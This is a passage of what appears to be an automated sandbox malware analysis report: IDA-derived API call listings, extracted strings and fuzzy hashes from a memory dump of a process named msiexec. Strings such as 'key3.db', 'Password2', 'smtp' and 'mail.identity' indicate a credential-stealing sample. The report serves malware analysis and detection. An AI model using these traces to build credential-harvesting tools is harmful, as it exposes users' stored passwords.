                                                                                                      • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                        • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                        • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$??2@??3@CloseHandleReadSize
                                                                                                      • String ID: Ul@$key3.db
                                                                                                      • API String ID: 3013762397-1563549157
                                                                                                      • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                      • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                      • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                      • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                      APIs
                                                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi$_mbscpy
                                                                                                      • String ID: smtp
                                                                                                      • API String ID: 2625860049-60245459
                                                                                                      • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                      • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C28C
                                                                                                      • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FocusMessagePostmemset
                                                                                                      • String ID: S_@$l
                                                                                                      • API String ID: 3436799508-4018740455
                                                                                                      • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                      • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004092C0
                                                                                                      • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                      Strings
                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString_mbscpymemset
                                                                                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                      • API String ID: 408644273-3424043681
                                                                                                      • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                      • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                      • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                      • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy
                                                                                                      • String ID: C^@$X$ini
                                                                                                      • API String ID: 714388716-917056472
                                                                                                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                      • String ID: MS Sans Serif
                                                                                                      • API String ID: 3492281209-168460110
                                                                                                      • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                      • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                      • String ID: edit
                                                                                                      • API String ID: 275601554-2167791130
                                                                                                      • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                      • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$_mbscat
                                                                                                      • String ID: 3CD
                                                                                                      • API String ID: 3951308622-1938365332
                                                                                                      • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                      • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$_mbscpy
                                                                                                      • String ID: Password2
                                                                                                      • API String ID: 2600922555-1856559283
                                                                                                      • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                      • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                      • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                      • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: rows deleted
                                                                                                      • API String ID: 2221118986-571615504
                                                                                                      • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                      • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                      • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                      • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 3384217055-0
                                                                                                      • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                      • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                      • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                      • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                      APIs
                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1860491036-0
                                                                                                      • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                      • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004048C2
                                                                                                      • memset.MSVCRT ref: 004048D6
                                                                                                      • memset.MSVCRT ref: 004048EA
                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 368790112-0
                                                                                                      • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                      • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                      • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                      • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                      • memset.MSVCRT ref: 0040D319
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 368790112-0
                                                                                                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                      APIs
                                                                                                      • __allrem.LIBCMT ref: 00425850
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                      • __allrem.LIBCMT ref: 00425933
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1992179935-0
                                                                                                      • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                      • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                      • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                      • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                      • API String ID: 2221118986-515162456
                                                                                                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                      APIs
                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                      • memset.MSVCRT ref: 004026AD
                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                        • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3503910906-0
                                                                                                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C922
                                                                                                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$MenuPostSendStringmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3798638045-0
                                                                                                      • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                      • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                      • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                      • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                      • strlen.MSVCRT ref: 0040B60B
                                                                                                      • atoi.MSVCRT(?), ref: 0040B619
                                                                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 4107816708-0
                                                                                                      • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                      • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                      • _gmtime64.MSVCRT ref: 00411437
                                                                                                      • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                      • strftime.MSVCRT ref: 00411476
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                      • String ID:
                                                                                                      • API String ID: 1886415126-0
                                                                                                      • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                      • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                      • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                      • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen
                                                                                                      • String ID: >$>$>
                                                                                                      • API String ID: 39653677-3911187716
                                                                                                      • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                      • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi
                                                                                                      • String ID: C@$mail.identity
                                                                                                      • API String ID: 1439213657-721921413
                                                                                                      • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                      • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
